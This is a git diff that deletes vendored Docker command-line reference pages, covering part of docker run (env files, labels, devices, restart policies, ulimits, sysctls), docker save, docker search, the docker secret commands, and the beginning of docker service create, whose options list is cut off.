-This sets simple (non-array) environmental variables in the container. For
-illustration all three
-flags are shown here. Where `-e`, `--env` take an environment variable and
-value, or if no `=` is provided, then that variable's current value, set via
-`export`, is passed through (i.e. `$MYVAR1` from the host is set to `$MYVAR1`
-in the container). When no `=` is provided and that variable is not defined
-in the client's environment then that variable will be removed from the
-container's list of environment variables. All three flags, `-e`, `--env` and
-`--env-file` can be repeated.
-
-Regardless of the order of these three flags, the `--env-file` are processed
-first, and then `-e`, `--env` flags. This way, the `-e` or `--env` will
-override variables as needed.
-
-    $ cat ./env.list
-    TEST_FOO=BAR
-    $ docker run --env TEST_FOO="This is a test" --env-file ./env.list busybox env | grep TEST_FOO
-    TEST_FOO=This is a test
-
-The `--env-file` flag takes a filename as an argument and expects each line
-to be in the `VAR=VAL` format, mimicking the argument passed to `--env`. Comment
-lines need only be prefixed with `#`
-
-An example of a file passed with `--env-file`
-
-    $ cat ./env.list
-    TEST_FOO=BAR
-
-    # this is a comment
-    TEST_APP_DEST_HOST=10.10.0.127
-    TEST_APP_DEST_PORT=8888
-    _TEST_BAR=FOO
-    TEST_APP_42=magic
-    helloWorld=true
-    123qwe=bar
-    org.spring.config=something
-
-    # pass through this variable from the caller
-    TEST_PASSTHROUGH
-    $ TEST_PASSTHROUGH=howdy docker run --env-file ./env.list busybox env
-    PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
-    HOSTNAME=5198e0745561
-    TEST_FOO=BAR
-    TEST_APP_DEST_HOST=10.10.0.127
-    TEST_APP_DEST_PORT=8888
-    _TEST_BAR=FOO
-    TEST_APP_42=magic
-    helloWorld=true
-    TEST_PASSTHROUGH=howdy
-    HOME=/root
-    123qwe=bar
-    org.spring.config=something
-
-    $ docker run --env-file ./env.list busybox env
-    PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
-    HOSTNAME=5198e0745561
-    TEST_FOO=BAR
-    TEST_APP_DEST_HOST=10.10.0.127
-    TEST_APP_DEST_PORT=8888
-    _TEST_BAR=FOO
-    TEST_APP_42=magic
-    helloWorld=true
-    TEST_PASSTHROUGH=
-    HOME=/root
-    123qwe=bar
-    org.spring.config=something
-
-### Set metadata on container (-l, --label, --label-file)
-
-A label is a `key=value` pair that applies metadata to a container. To label a container with two labels:
-
-    $ docker run -l my-label --label com.example.foo=bar ubuntu bash
-
-The `my-label` key doesn't specify a value so the label defaults to an empty
-string(`""`). To add multiple labels, repeat the label flag (`-l` or `--label`).
-
-The `key=value` must be unique to avoid overwriting the label value. If you
-specify labels with identical keys but different values, each subsequent value
-overwrites the previous. Docker uses the last `key=value` you supply.
-
-Use the `--label-file` flag to load multiple labels from a file. Delimit each
-label in the file with an EOL mark. The example below loads labels from a
-labels file in the current directory:
-
-    $ docker run --label-file ./labels ubuntu bash
-
-The label-file format is similar to the format for loading environment
-variables. (Unlike environment variables, labels are not visible to processes
-running inside a container.) The following example illustrates a label-file
-format:
-
-    com.example.label1="a label"
-
-    # this is a comment
-    com.example.label2=another\ label
-    com.example.label3
-
-You can load multiple label-files by supplying multiple  `--label-file` flags.
-
-For additional information on working with labels, see [*Labels - custom
-metadata in Docker*](https://docs.docker.com/engine/userguide/labels-custom-metadata/) in the Docker User
-Guide.
-
-### Connect a container to a network (--network)
-
-When you start a container use the `--network` flag to connect it to a network.
-This adds the `busybox` container to the `my-net` network.
-
-```bash
-$ docker run -itd --network=my-net busybox
-```
-
-You can also choose the IP addresses for the container with `--ip` and `--ip6`
-flags when you start the container on a user-defined network.
-
-```bash
-$ docker run -itd --network=my-net --ip=10.10.9.75 busybox
-```
-
-If you want to add a running container to a network use the `docker network connect` subcommand.
-
-You can connect multiple containers to the same network. Once connected, the
-containers can communicate easily need only another container's IP address
-or name. For `overlay` networks or custom plugins that support multi-host
-connectivity, containers connected to the same multi-host network but launched
-from different Engines can also communicate in this way.
-
-**Note**: Service discovery is unavailable on the default bridge network.
-Containers can communicate via their IP addresses by default. To communicate
-by name, they must be linked.
-
-You can disconnect a container from a network using the `docker network
-disconnect` command.
-
-### Mount volumes from container (--volumes-from)
-
-    $ docker run --volumes-from 777f7dc92da7 --volumes-from ba8c0c54f0f2:ro -i -t ubuntu pwd
-
-The `--volumes-from` flag mounts all the defined volumes from the referenced
-containers. Containers can be specified by repetitions of the `--volumes-from`
-argument. The container ID may be optionally suffixed with `:ro` or `:rw` to
-mount the volumes in read-only or read-write mode, respectively. By default,
-the volumes are mounted in the same mode (read write or read only) as
-the reference container.
-
-Labeling systems like SELinux require that proper labels are placed on volume
-content mounted into a container. Without a label, the security system might
-prevent the processes running inside the container from using the content. By
-default, Docker does not change the labels set by the OS.
-
-To change the label in the container context, you can add either of two suffixes
-`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file
-objects on the shared volumes. The `z` option tells Docker that two containers
-share the volume content. As a result, Docker labels the content with a shared
-content label. Shared volume labels allow all containers to read/write content.
-The `Z` option tells Docker to label the content with a private unshared label.
-Only the current container can use a private volume.
-
-### Attach to STDIN/STDOUT/STDERR (-a)
-
-The `-a` flag tells `docker run` to bind to the container's `STDIN`, `STDOUT`
-or `STDERR`. This makes it possible to manipulate the output and input as
-needed.
-
-    $ echo "test" | docker run -i -a stdin ubuntu cat -
-
-This pipes data into a container and prints the container's ID by attaching
-only to the container's `STDIN`.
-
-    $ docker run -a stderr ubuntu echo test
-
-This isn't going to print anything unless there's an error because we've
-only attached to the `STDERR` of the container. The container's logs
-still store what's been written to `STDERR` and `STDOUT`.
-
-    $ cat somefile | docker run -i -a stdin mybuilder dobuild
-
-This is how piping a file into a container could be done for a build.
-The container's ID will be printed after the build is done and the build
-logs could be retrieved using `docker logs`. This is
-useful if you need to pipe a file or something else into a container and
-retrieve the container's ID once the container has finished running.
-
-### Add host device to container (--device)
-
-    $ docker run --device=/dev/sdc:/dev/xvdc --device=/dev/sdd --device=/dev/zero:/dev/nulo -i -t ubuntu ls -l /dev/{xvdc,sdd,nulo}
-    brw-rw---- 1 root disk 8, 2 Feb  9 16:05 /dev/xvdc
-    brw-rw---- 1 root disk 8, 3 Feb  9 16:05 /dev/sdd
-    crw-rw-rw- 1 root root 1, 5 Feb  9 16:05 /dev/nulo
-
-It is often necessary to directly expose devices to a container. The `--device`
-option enables that. For example, a specific block storage device or loop
-device or audio device can be added to an otherwise unprivileged container
-(without the `--privileged` flag) and have the application directly access it.
-
-By default, the container will be able to `read`, `write` and `mknod` these devices.
-This can be overridden using a third `:rwm` set of options to each `--device`
-flag:
-
-
-    $ docker run --device=/dev/sda:/dev/xvdc --rm -it ubuntu fdisk  /dev/xvdc
-
-    Command (m for help): q
-    $ docker run --device=/dev/sda:/dev/xvdc:r --rm -it ubuntu fdisk  /dev/xvdc
-    You will not be able to write the partition table.
-
-    Command (m for help): q
-
-    $ docker run --device=/dev/sda:/dev/xvdc:rw --rm -it ubuntu fdisk  /dev/xvdc
-
-    Command (m for help): q
-
-    $ docker run --device=/dev/sda:/dev/xvdc:m --rm -it ubuntu fdisk  /dev/xvdc
-    fdisk: unable to open /dev/xvdc: Operation not permitted
-
-> **Note:**
-> `--device` cannot be safely used with ephemeral devices. Block devices
-> that may be removed should not be added to untrusted containers with
-> `--device`.
-
-### Restart policies (--restart)
-
-Use Docker's `--restart` to specify a container's *restart policy*. A restart
-policy controls whether the Docker daemon restarts a container after exit.
-Docker supports the following restart policies:
-
-<table>
-  <thead>
-    <tr>
-      <th>Policy</th>
-      <th>Result</th>
-    </tr>
-  </thead>
-  <tbody>
-    <tr>
-      <td><strong>no</strong></td>
-      <td>
-        Do not automatically restart the container when it exits. This is the
-        default.
-      </td>
-    </tr>
-    <tr>
-      <td>
-        <span style="white-space: nowrap">
-          <strong>on-failure</strong>[:max-retries]
-        </span>
-      </td>
-      <td>
-        Restart only if the container exits with a non-zero exit status.
-        Optionally, limit the number of restart retries the Docker
-        daemon attempts.
-      </td>
-    </tr>
-    <tr>
-      <td><strong>always</strong></td>
-      <td>
-        Always restart the container regardless of the exit status.
-        When you specify always, the Docker daemon will try to restart
-        the container indefinitely. The container will also always start
-        on daemon startup, regardless of the current state of the container.
-      </td>
-    </tr>
-    <tr>
-      <td><strong>unless-stopped</strong></td>
-      <td>
-        Always restart the container regardless of the exit status, but
-        do not start it on daemon startup if the container has been put
-        to a stopped state before.
-      </td>
-    </tr>
-  </tbody>
-</table>
-
-    $ docker run --restart=always redis
-
-This will run the `redis` container with a restart policy of **always**
-so that if the container exits, Docker will restart it.
-
-More detailed information on restart policies can be found in the
-[Restart Policies (--restart)](../run.md#restart-policies-restart)
-section of the Docker run reference page.
-
-### Add entries to container hosts file (--add-host)
-
-You can add other hosts into a container's `/etc/hosts` file by using one or
-more `--add-host` flags. This example adds a static address for a host named
-`docker`:
-
-    $ docker run --add-host=docker:10.180.0.1 --rm -it debian
-    root@f38c87f2a42d:/# ping docker
-    PING docker (10.180.0.1): 48 data bytes
-    56 bytes from 10.180.0.1: icmp_seq=0 ttl=254 time=7.600 ms
-    56 bytes from 10.180.0.1: icmp_seq=1 ttl=254 time=30.705 ms
-    ^C--- docker ping statistics ---
-    2 packets transmitted, 2 packets received, 0% packet loss
-    round-trip min/avg/max/stddev = 7.600/19.152/30.705/11.553 ms
-
-Sometimes you need to connect to the Docker host from within your
-container. To enable this, pass the Docker host's IP address to
-the container using the `--add-host` flag. To find the host's address,
-use the `ip addr show` command.
-
-The flags you pass to `ip addr show` depend on whether you are
-using IPv4 or IPv6 networking in your containers. Use the following
-flags for IPv4 address retrieval for a network device named `eth0`:
-
-    $ HOSTIP=`ip -4 addr show scope global dev eth0 | grep inet | awk '{print \$2}' | cut -d / -f 1`
-    $ docker run  --add-host=docker:${HOSTIP} --rm -it debian
-
-For IPv6 use the `-6` flag instead of the `-4` flag. For other network
-devices, replace `eth0` with the correct device name (for example `docker0`
-for the bridge device).
-
-### Set ulimits in container (--ulimit)
-
-Since setting `ulimit` settings in a container requires extra privileges not
-available in the default container, you can set these using the `--ulimit` flag.
-`--ulimit` is specified with a soft and hard limit as such:
-`<type>=<soft limit>[:<hard limit>]`, for example:
-
-    $ docker run --ulimit nofile=1024:1024 --rm debian sh -c "ulimit -n"
-    1024
-
-> **Note:**
-> If you do not provide a `hard limit`, the `soft limit` will be used
-> for both values. If no `ulimits` are set, they will be inherited from
-> the default `ulimits` set on the daemon.  `as` option is disabled now.
-> In other words, the following script is not supported:
-> `$ docker run -it --ulimit as=1024 fedora /bin/bash`
-
-The values are sent to the appropriate `syscall` as they are set.
-Docker doesn't perform any byte conversion. Take this into account when setting the values.
-
-#### For `nproc` usage
-
-Be careful setting `nproc` with the `ulimit` flag as `nproc` is designed by Linux to set the
-maximum number of processes available to a user, not to a container.  For example, start four
-containers with `daemon` user:
-
-    docker run -d -u daemon --ulimit nproc=3 busybox top
-    docker run -d -u daemon --ulimit nproc=3 busybox top
-    docker run -d -u daemon --ulimit nproc=3 busybox top
-    docker run -d -u daemon --ulimit nproc=3 busybox top
-
-The 4th container fails and reports "[8] System error: resource temporarily unavailable" error.
-This fails because the caller set `nproc=3` resulting in the first three containers using up
-the three processes quota set for the `daemon` user.
-
-### Stop container with signal (--stop-signal)
-
-The `--stop-signal` flag sets the system call signal that will be sent to the container to exit.
-This signal can be a valid unsigned number that matches a position in the kernel's syscall table, for instance 9,
-or a signal name in the format SIGNAME, for instance SIGKILL.
-
-### Optional security options (--security-opt)
-
-On Windows, this flag can be used to specify the `credentialspec` option.
-The `credentialspec` must be in the format `file://spec.txt` or `registry://keyname`.
-
-### Stop container with timeout (--stop-timeout)
-
-The `--stop-timeout` flag sets the timeout (in seconds) that a pre-defined (see `--stop-signal`) system call
-signal that will be sent to the container to exit. After timeout elapses the container will be killed with SIGKILL.
-
-### Specify isolation technology for container (--isolation)
-
-This option is useful in situations where you are running Docker containers on
-Microsoft Windows. The `--isolation <value>` option sets a container's isolation
-technology. On Linux, the only supported is the `default` option which uses
-Linux namespaces. These two commands are equivalent on Linux:
-
-```
-$ docker run -d busybox top
-$ docker run -d --isolation default busybox top
-```
-
-On Microsoft Windows, can take any of these values:
-
-
-| Value     | Description                                                                                                                                                   |
-|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|
-| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value.  |
-| `process` | Namespace isolation only.                                                                                                                                     |
-| `hyperv`   | Hyper-V hypervisor partition-based isolation.                                                                                                                  |
-
-On Windows, the default isolation for client is `hyperv`, and for server is
-`process`. Therefore when running on Windows server without a `daemon` option
-set, these two commands are equivalent:
-```
-$ docker run -d --isolation default busybox top
-$ docker run -d --isolation process busybox top
-```
-
-If you have set the `--exec-opt isolation=hyperv` option on the Docker `daemon`,
-if running on Windows server, any of these commands also result in `hyperv` isolation:
-
-```
-$ docker run -d --isolation default busybox top
-$ docker run -d --isolation hyperv busybox top
-```
-
-### Configure namespaced kernel parameters (sysctls) at runtime
-
-The `--sysctl` sets namespaced kernel parameters (sysctls) in the
-container. For example, to turn on IP forwarding in the containers
-network namespace, run this command:
-
-    $ docker run --sysctl net.ipv4.ip_forward=1 someimage
-
-
-> **Note**: Not all sysctls are namespaced. Docker does not support changing sysctls
-> inside of a container that also modify the host system. As the kernel
-> evolves we expect to see more sysctls become namespaced.
-
-#### Currently supported sysctls
-
-  `IPC Namespace`:
-
-  kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced
-  Sysctls beginning with fs.mqueue.*
-
-  If you use the `--ipc=host` option these sysctls will not be allowed.
-
-  `Network Namespace`:
-      Sysctls beginning with net.*
-
-  If you use the `--network=host` option using these sysctls will not be allowed.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/save.md b/vendor/github.com/docker/docker/docs/reference/commandline/save.md
deleted file mode 100644
index 88a5fed103..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/save.md
+++ /dev/null
@@ -1,45 +0,0 @@
----
-title: "save"
-description: "The save command description and usage"
-keywords: "tarred, repository, backup"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# save
-
-```markdown
-Usage:  docker save [OPTIONS] IMAGE [IMAGE...]
-
-Save one or more images to a tar archive (streamed to STDOUT by default)
-
-Options:
-      --help            Print usage
-  -o, --output string   Write to a file, instead of STDOUT
-```
-
-Produces a tarred repository to the standard output stream.
-Contains all parent layers, and all tags + versions, or specified `repo:tag`, for
-each argument provided.
-
-It is used to create a backup that can then be used with `docker load`
-
-    $ docker save busybox > busybox.tar
-    $ ls -sh busybox.tar
-    2.7M busybox.tar
-    $ docker save --output busybox.tar busybox
-    $ ls -sh busybox.tar
-    2.7M busybox.tar
-    $ docker save -o fedora-all.tar fedora
-    $ docker save -o fedora-latest.tar fedora:latest
-
-It is even useful to cherry-pick particular tags of an image repository
-
-    $ docker save -o ubuntu.tar ubuntu:lucid ubuntu:saucy
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/search.md b/vendor/github.com/docker/docker/docs/reference/commandline/search.md
deleted file mode 100644
index 31faf37375..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/search.md
+++ /dev/null
@@ -1,134 +0,0 @@
----
-title: "search"
-description: "The search command description and usage"
-keywords: "search, hub, images"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# search
-
-```markdown
-Usage:  docker search [OPTIONS] TERM
-
-Search the Docker Hub for images
-
-Options:
-  -f, --filter value   Filter output based on conditions provided (default [])
-                       - is-automated=(true|false)
-                       - is-official=(true|false)
-                       - stars=<number> - image has at least 'number' stars
-      --help           Print usage
-      --limit int      Max number of search results (default 25)
-      --no-trunc       Don't truncate output
-```
-
-Search [Docker Hub](https://hub.docker.com) for images
-
-See [*Find Public Images on Docker Hub*](https://docs.docker.com/engine/tutorials/dockerrepos/#searching-for-images) for
-more details on finding shared images from the command line.
-
-> **Note:**
-> Search queries will only return up to 25 results
-
-## Examples
-
-### Search images by name
-
-This example displays images with a name containing 'busybox':
-
-    $ docker search busybox
-    NAME                             DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
-    busybox                          Busybox base image.                             316       [OK]       
-    progrium/busybox                                                                 50                   [OK]
-    radial/busyboxplus               Full-chain, Internet enabled, busybox made...   8                    [OK]
-    odise/busybox-python                                                             2                    [OK]
-    azukiapp/busybox                 This image is meant to be used as the base...   2                    [OK]
-    ofayau/busybox-jvm               Prepare busybox to install a 32 bits JVM.       1                    [OK]
-    shingonoide/archlinux-busybox    Arch Linux, a lightweight and flexible Lin...   1                    [OK]
-    odise/busybox-curl                                                               1                    [OK]
-    ofayau/busybox-libc32            Busybox with 32 bits (and 64 bits) libs         1                    [OK]
-    peelsky/zulu-openjdk-busybox                                                     1                    [OK]
-    skomma/busybox-data              Docker image suitable for data volume cont...   1                    [OK]
-    elektritter/busybox-teamspeak    Lightweight teamspeak3 container based on...    1                    [OK]
-    socketplane/busybox                                                              1                    [OK]
-    oveits/docker-nginx-busybox      This is a tiny NginX docker image based on...   0                    [OK]
-    ggtools/busybox-ubuntu           Busybox ubuntu version with extra goodies       0                    [OK]
-    nikfoundas/busybox-confd         Minimal busybox based distribution of confd     0                    [OK]
-    openshift/busybox-http-app                                                       0                    [OK]
-    jllopis/busybox                                                                  0                    [OK]
-    swyckoff/busybox                                                                 0                    [OK]
-    powellquiring/busybox                                                            0                    [OK]
-    williamyeh/busybox-sh            Docker image for BusyBox's sh                   0                    [OK]
-    simplexsys/busybox-cli-powered   Docker busybox images, with a few often us...   0                    [OK]
-    fhisamoto/busybox-java           Busybox java                                    0                    [OK]
-    scottabernethy/busybox                                                           0                    [OK]
-    marclop/busybox-solr
-
-### Display non-truncated description (--no-trunc)
-
-This example displays images with a name containing 'busybox',
-at least 3 stars and the description isn't truncated in the output:
-
-    $ docker search --stars=3 --no-trunc busybox
-    NAME                 DESCRIPTION                                                                               STARS     OFFICIAL   AUTOMATED
-    busybox              Busybox base image.                                                                       325       [OK]       
-    progrium/busybox                                                                                               50                   [OK]
-    radial/busyboxplus   Full-chain, Internet enabled, busybox made from scratch. Comes in git and cURL flavors.   8                    [OK]
-
-## Limit search results (--limit)
-
-The flag `--limit` is the maximum number of results returned by a search. This value could
-be in the range between 1 and 100. The default value of `--limit` is 25.
-
-
-## Filtering
-
-The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there is more
-than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`)
-
-The currently supported filters are:
-
-* stars (int - number of stars the image has)
-* is-automated (true|false) - is the image automated or not
-* is-official (true|false) - is the image official or not
-
-
-### stars
-
-This example displays images with a name containing 'busybox' and at
-least 3 stars:
-
-    $ docker search --filter stars=3 busybox
-    NAME                 DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
-    busybox              Busybox base image.                             325       [OK]       
-    progrium/busybox                                                     50                   [OK]
-    radial/busyboxplus   Full-chain, Internet enabled, busybox made...   8                    [OK]
-
-
-### is-automated
-
-This example displays images with a name containing 'busybox'
-and are automated builds:
-
-    $ docker search --filter is-automated busybox
-    NAME                 DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
-    progrium/busybox                                                     50                   [OK]
-    radial/busyboxplus   Full-chain, Internet enabled, busybox made...   8                    [OK]
-
-### is-official
-
-This example displays images with a name containing 'busybox', at least
-3 stars and are official builds:
-
-    $ docker search --filter "is-official=true" --filter "stars=3" busybox
-    NAME                 DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
-    progrium/busybox                                                     50                   [OK]
-    radial/busyboxplus   Full-chain, Internet enabled, busybox made...   8                    [OK]
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md
deleted file mode 100644
index aebcebbcdd..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md
+++ /dev/null
@@ -1,90 +0,0 @@
----
-title: "secret create"
-description: "The secret create command description and usage"
-keywords: ["secret, create"]
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# secret create
-
-```Markdown
-Usage:	docker secret create [OPTIONS] SECRET file|-
-
-Create a secret from a file or STDIN as content
-
-Options:
-      --help          Print usage
-  -l, --label list    Secret labels (default [])
-```
-
-Creates a secret using standard input or from a file for the secret content. You must run this
-command on a manager node.
-
-## Examples
-
-### Create a secret
-
-```bash
-$ echo <secret> | docker secret create my_secret -
-mhv17xfe3gh6xc4rij5orpfds
-
-$ docker secret ls
-ID                          NAME                    CREATED                                   UPDATED                                   SIZE
-mhv17xfe3gh6xc4rij5orpfds   my_secret               2016-10-27 23:25:43.909181089 +0000 UTC   2016-10-27 23:25:43.909181089 +0000 UTC   1679
-```
-
-### Create a secret with a file
-
-```bash
-$ docker secret create my_secret ./secret.json
-mhv17xfe3gh6xc4rij5orpfds
-
-$ docker secret ls
-ID                          NAME                    CREATED                                   UPDATED                                   SIZE
-mhv17xfe3gh6xc4rij5orpfds   my_secret               2016-10-27 23:25:43.909181089 +0000 UTC   2016-10-27 23:25:43.909181089 +0000 UTC   1679
-```
-
-### Create a secret with labels
-
-```bash
-$ docker secret create --label env=dev --label rev=20161102 my_secret ./secret.json
-jtn7g6aukl5ky7nr9gvwafoxh
-
-$ docker secret inspect my_secret
-[
-    {
-        "ID": "jtn7g6aukl5ky7nr9gvwafoxh",
-        "Version": {
-            "Index": 541
-        },
-        "CreatedAt": "2016-11-03T20:54:12.924766548Z",
-        "UpdatedAt": "2016-11-03T20:54:12.924766548Z",
-        "Spec": {
-            "Name": "my_secret",
-            "Labels": {
-                "env": "dev",
-                "rev": "20161102"
-            },
-            "Data": null
-        },
-        "Digest": "sha256:4212a44b14e94154359569333d3fc6a80f6b9959dfdaff26412f4b2796b1f387",
-        "SecretSize": 1679
-    }
-]
-
-```
-
-
-## Related information
-
-* [secret inspect](secret_inspect.md)
-* [secret ls](secret_ls.md)
-* [secret rm](secret_rm.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md
deleted file mode 100644
index de878f74e4..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md
+++ /dev/null
@@ -1,85 +0,0 @@
----
-title: "secret inspect"
-description: "The secret inspect command description and usage"
-keywords: ["secret, inspect"]
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# secret inspect
-
-```Markdown
-Usage:  docker secret inspect [OPTIONS] SECRET [SECRET...]
-
-Display detailed information on one or more secrets
-
-Options:
-  -f, --format string   Format the output using the given Go template
-      --help            Print usage
-```
-
-
-Inspects the specified secret. This command has to be run targeting a manager
-node.
-
-By default, this renders all results in a JSON array. If a format is specified,
-the given template will be executed for each result.
-
-Go's [text/template](http://golang.org/pkg/text/template/) package
-describes all the details of the format.
-
-## Examples
-
-### Inspecting a secret by name or ID
-
-You can inspect a secret, either by its *name*, or *ID*
-
-For example, given the following secret:
-
-```bash
-$ docker secret ls
-ID                          NAME                    CREATED                                   UPDATED
-mhv17xfe3gh6xc4rij5orpfds   secret.json             2016-10-27 23:25:43.909181089 +0000 UTC   2016-10-27 23:25:43.909181089 +0000 UTC
-```
-
-```bash
-$ docker secret inspect secret.json
-[
-    {
-        "ID": "mhv17xfe3gh6xc4rij5orpfds",
-            "Version": {
-            "Index": 1198
-        },
-        "CreatedAt": "2016-10-27T23:25:43.909181089Z",
-        "UpdatedAt": "2016-10-27T23:25:43.909181089Z",
-        "Spec": {
-            "Name": "secret.json"
-        }
-    }
-]
-```
-
-### Formatting secret output
-
-You can use the --format option to obtain specific information about a
-secret. The following example command outputs the creation time of the
-secret.
-
-```bash{% raw %}
-$ docker secret inspect --format='{{.CreatedAt}}' mhv17xfe3gh6xc4rij5orpfds
-2016-10-27 23:25:43.909181089 +0000 UTC
-{% endraw %}```
-
-
-## Related information
-
-* [secret create](secret_create.md)
-* [secret ls](secret_ls.md)
-* [secret rm](secret_rm.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md
deleted file mode 100644
index 6b34fc2146..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md
+++ /dev/null
@@ -1,43 +0,0 @@
----
-title: "secret ls"
-description: "The secret ls command description and usage"
-keywords: ["secret, ls"]
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# secret ls
-
-```Markdown
-Usage:	docker secret ls [OPTIONS]
-
-List secrets
-
-Aliases:
-  ls, list
-
-Options:
-  -q, --quiet          Only display IDs
-```
-
-Run this command on a manager node to list the secrets in the Swarm.
-
-## Examples
-
-```bash
-$ docker secret ls
-ID                          NAME                    CREATED                                   UPDATED
-mhv17xfe3gh6xc4rij5orpfds   secret.json             2016-10-27 23:25:43.909181089 +0000 UTC   2016-10-27 23:25:43.909181089 +0000 UTC
-```
-## Related information
-
-* [secret create](secret_create.md)
-* [secret inspect](secret_inspect.md)
-* [secret rm](secret_rm.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md
deleted file mode 100644
index f504b1ba4f..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md
+++ /dev/null
@@ -1,48 +0,0 @@
----
-title: "secret rm"
-description: "The secret rm command description and usage"
-keywords: ["secret, rm"]
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# secret rm
-
-```Markdown
-Usage:	docker secret rm SECRET [SECRET...]
-
-Remove one or more secrets
-
-Aliases:
-  rm, remove
-
-Options:
-      --help   Print usage
-```
-
-Removes the specified secrets from the swarm. This command has to be run
-targeting a manager node.
-
-This example removes a secret:
-
-```bash
-$ docker secret rm secret.json
-sapth4csdo5b6wz2p5uimh5xg
-```
-
-> **Warning**: Unlike `docker rm`, this command does not ask for confirmation
-> before removing a secret.
-
-
-## Related information
-
-* [secret create](secret_create.md)
-* [secret inspect](secret_inspect.md)
-* [secret ls](secret_ls.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md
deleted file mode 100644
index c9e298096b..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md
+++ /dev/null
@@ -1,556 +0,0 @@
----
-title: "service create"
-description: "The service create command description and usage"
-keywords: "service, create"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# service create
-
-```Markdown
-Usage:  docker service create [OPTIONS] IMAGE [COMMAND] [ARG...]
-
-Create a new service
-
-Options:
-      --constraint list                  Placement constraints (default [])
-      --container-label list             Container labels (default [])
-      --dns list                         Set custom DNS servers (default [])
-      --dns-option list                  Set DNS options (default [])
-      --dns-search list                  Set custom DNS search domains (default [])
-      --endpoint-mode string             Endpoint mode (vip or dnsrr)
-  -e, --env list                         Set environment variables (default [])
-      --env-file list                    Read in a file of environment variables (default [])
-      --group list                       Set one or more supplementary user groups for the container (default [])
-      --health-cmd string                Command to run to check health
-      --health-interval duration         Time between running the check (ns|us|ms|s|m|h)
-      --health-retries int               Consecutive failures needed to report unhealthy
-      --health-timeout duration          Maximum time to allow one check to run (ns|us|ms|s|m|h)
-      --help                             Print usage
-      --host list                        Set one or more custom host-to-IP mappings (host:ip) (default [])
-      --hostname string                  Container hostname
-  -l, --label list                       Service labels (default [])
-      --limit-cpu decimal                Limit CPUs (default 0.000)
-      --limit-memory bytes               Limit Memory (default 0 B)
-      --log-driver string                Logging driver for service
-      --log-opt list                     Logging driver options (default [])
-      --mode string                      Service mode (replicated or global) (default "replicated")
-      --mount mount                      Attach a filesystem mount to the service
-      --name string                      Service name
-      --network list                     Network attachments (default [])
-      --no-healthcheck                   Disable any container-specified HEALTHCHECK
-  -p, --publish port                     Publish a port as a node port
-      --replicas uint                    Number of tasks
-      --reserve-cpu decimal              Reserve CPUs (default 0.000)
-      --reserve-memory bytes             Reserve Memory (default 0 B)
-      --restart-condition string         Restart when condition is met (none, on-failure, or any)
-      --restart-delay duration           Delay between restart attempts (ns|us|ms|s|m|h)
